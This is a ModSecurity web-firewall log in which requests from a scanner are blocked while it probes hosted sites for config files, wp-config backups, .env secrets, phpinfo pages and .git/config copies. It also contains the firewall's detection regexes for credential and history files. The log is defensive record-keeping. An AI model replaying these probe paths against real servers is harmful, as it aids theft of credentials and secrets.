[Tue May 26 13:32:15.892252 2026] [security2:error] [pid 512344:tid 512407] [remote 74.7.241.58:33290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVTh8bElyei4S77DQcMyQAAST4"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/SimplePie/Cache
[Tue May 26 13:32:16.271019 2026] [security2:error] [pid 512745:tid 512872] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2tgABSn4"]
[Tue May 26 13:32:16.362820 2026] [security2:error] [pid 512745:tid 512767] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/aws.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2wQABDxU"]
[Tue May 26 13:32:16.394917 2026] [security2:error] [pid 512745:tid 512870] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.inc.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2wwABdnw"]
[Tue May 26 13:32:16.425662 2026] [security2:error] [pid 512745:tid 512746] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2xwABWwA"]
[Tue May 26 13:32:16.464002 2026] [security2:error] [pid 512745:tid 512850] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/env.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2zQABiGg"]
[Tue May 26 13:32:16.490200 2026] [security2:error] [pid 512745:tid 512748] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/module.config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN20AABRgI"]
[Tue May 26 13:32:16.492751 2026] [security2:error] [pid 512745:tid 512757] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/nexmo.php"] [unique_id "ahVTiHKSB_s2CvZg7xN20QABSQs"]
[Tue May 26 13:32:16.547285 2026] [security2:error] [pid 512344:tid 512558] [client 66.249.93.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVThsbElyei4S77DQcMrgAAAFQ"]
[Tue May 26 13:32:16.549441 2026] [security2:error] [pid 512745:tid 512820] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/stripe.php"] [unique_id "ahVTiHKSB_s2CvZg7xN21QABEko"]
[Tue May 26 13:32:17.133764 2026] [security2:error] [pid 512745:tid 512844] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HAABKGI"]
[Tue May 26 13:32:17.145827 2026] [security2:error] [pid 512745:tid 512843] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infophp.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HQABTmE"]
[Tue May 26 13:32:17.153317 2026] [security2:error] [pid 512745:tid 512822] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infos.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HgABNkw"]
[Tue May 26 13:32:17.366407 2026] [security2:error] [pid 512745:tid 512964] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTiHKSB_s2CvZg7xN3BAAAAWM"]
[Tue May 26 13:32:17.578129 2026] [security2:error] [pid 512745:tid 512786] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php-info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3VgABPSg"]
[Tue May 26 13:32:17.586642 2026] [security2:error] [pid 512745:tid 512834] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3VwABPVg"]
[Tue May 26 13:32:17.595867 2026] [security2:error] [pid 512745:tid 512850] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php_info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3WAABfGg"]
[Tue May 26 13:32:17.614400 2026] [security2:error] [pid 512745:tid 512829] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3WgABblM"]
[Tue May 26 13:32:17.736854 2026] [security2:error] [pid 512745:tid 512852] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3bwABOGo"]
[Tue May 26 13:32:18.556906 2026] [security2:error] [pid 512745:tid 512897] [client 4.228.83.111:64357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahVTinKSB_s2CvZg7xN30QAAASA"]
[Tue May 26 13:32:18.557021 2026] [security2:error] [pid 512745:tid 512897] [client 4.228.83.111:64357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahVTinKSB_s2CvZg7xN30QAAASA"]
[Tue May 26 13:32:19.033758 2026] [security2:error] [pid 512745:tid 512889] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTinKSB_s2CvZg7xN30wAAARg"]
[Tue May 26 13:32:19.722850 2026] [security2:error] [pid 512745:tid 512831] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVTi3KSB_s2CvZg7xN4AQABclU"]
[Tue May 26 13:32:19.808893 2026] [security2:error] [pid 512745:tid 512814] [remote 213.246.101.88:39344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.101.246.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVTi3KSB_s2CvZg7xN39wABdUQ"]
[Tue May 26 13:32:20.678328 2026] [security2:error] [pid 512745:tid 512787] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVTjHKSB_s2CvZg7xN4PwABeCk"]
[Tue May 26 13:32:20.795321 2026] [security2:error] [pid 512745:tid 512803] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVTjHKSB_s2CvZg7xN4QgABgzk"]
[Tue May 26 13:32:20.797533 2026] [security2:error] [pid 512745:tid 512849] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVTjHKSB_s2CvZg7xN4QwABJWc"]
[Tue May 26 13:32:20.866474 2026] [security2:error] [pid 512745:tid 512801] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVTjHKSB_s2CvZg7xN4SQABHDc"]
[Tue May 26 13:32:21.198703 2026] [security2:error] [pid 512745:tid 512956] [client 45.148.10.95:7406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4TgAAAVs"]
[Tue May 26 13:32:21.253260 2026] [security2:error] [pid 512344:tid 512557] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTjcbElyei4S77DQcM_wAAAFM"]
[Tue May 26 13:32:21.323981 2026] [security2:error] [pid 512344:tid 512500] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/*update.cgi*"] [unique_id "ahVTjcbElyei4S77DQcNAwAAABo"]
[Tue May 26 13:32:21.484663 2026] [security2:error] [pid 512344:tid 512524] [client 45.148.10.95:7394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.docker/.env"] [unique_id "ahVTjcbElyei4S77DQcNBgAAADI"]
[Tue May 26 13:32:21.523016 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:7338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.docker/laravel/app/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4YAAAAVI"]
[Tue May 26 13:32:21.548781 2026] [security2:error] [pid 512745:tid 512900] [client 45.148.10.95:7462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4YgAAASM"]
[Tue May 26 13:32:21.593016 2026] [security2:error] [pid 512745:tid 512919] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVTjXKSB_s2CvZg7xN4ZAAAATY"]
[Tue May 26 13:32:21.598697 2026] [security2:error] [pid 512745:tid 512928] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVTjXKSB_s2CvZg7xN4ZgAAAT8"]
[Tue May 26 13:32:21.788635 2026] [security2:error] [pid 512745:tid 512998] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVTjXKSB_s2CvZg7xN4bQAAAYU"]
[Tue May 26 13:32:21.813877 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTjXKSB_s2CvZg7xN4WgAAARI"]
[Tue May 26 13:32:21.844116 2026] [security2:error] [pid 512344:tid 512482] [client 45.148.10.95:7428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVTjcbElyei4S77DQcNFAAAAAg"]
[Tue May 26 13:32:22.020773 2026] [security2:error] [pid 512344:tid 512479] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVTjsbElyei4S77DQcNGAAAAAU"]
[Tue May 26 13:32:22.056552 2026] [security2:error] [pid 512745:tid 512989] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVTjnKSB_s2CvZg7xN4eAAAAXw"]
[Tue May 26 13:32:22.202370 2026] [security2:error] [pid 512344:tid 512530] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config.bak"] [unique_id "ahVTjsbElyei4S77DQcNIgAAADg"]
[Tue May 26 13:32:22.236524 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config.old"] [unique_id "ahVTjnKSB_s2CvZg7xN4ggAAATM"]
[Tue May 26 13:32:22.290644 2026] [security2:error] [pid 512344:tid 512548] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config~"] [unique_id "ahVTjsbElyei4S77DQcNJgAAAEo"]
[Tue May 26 13:32:23.017133 2026] [security2:error] [pid 512745:tid 512973] [client 45.148.10.95:7406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.wp-config.php.swp"] [unique_id "ahVTj3KSB_s2CvZg7xN4rAAAAWw"]
[Tue May 26 13:32:23.026264 2026] [security2:error] [pid 512344:tid 512478] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/ADMIN/.env"] [unique_id "ahVTj8bElyei4S77DQcNSAAAAAQ"]
[Tue May 26 13:32:23.042135 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/API/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4rgAAATg"]
[Tue May 26 13:32:23.144118 2026] [security2:error] [pid 512344:tid 512523] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/APP/.env"] [unique_id "ahVTj8bElyei4S77DQcNTgAAADE"]
[Tue May 26 13:32:23.144517 2026] [security2:error] [pid 512745:tid 512881] [client 45.148.10.95:7480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/Api/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4swAAARA"]
[Tue May 26 13:32:23.154443 2026] [security2:error] [pid 512745:tid 512965] [client 45.148.10.95:7338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/BACK/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4tAAAAWQ"]
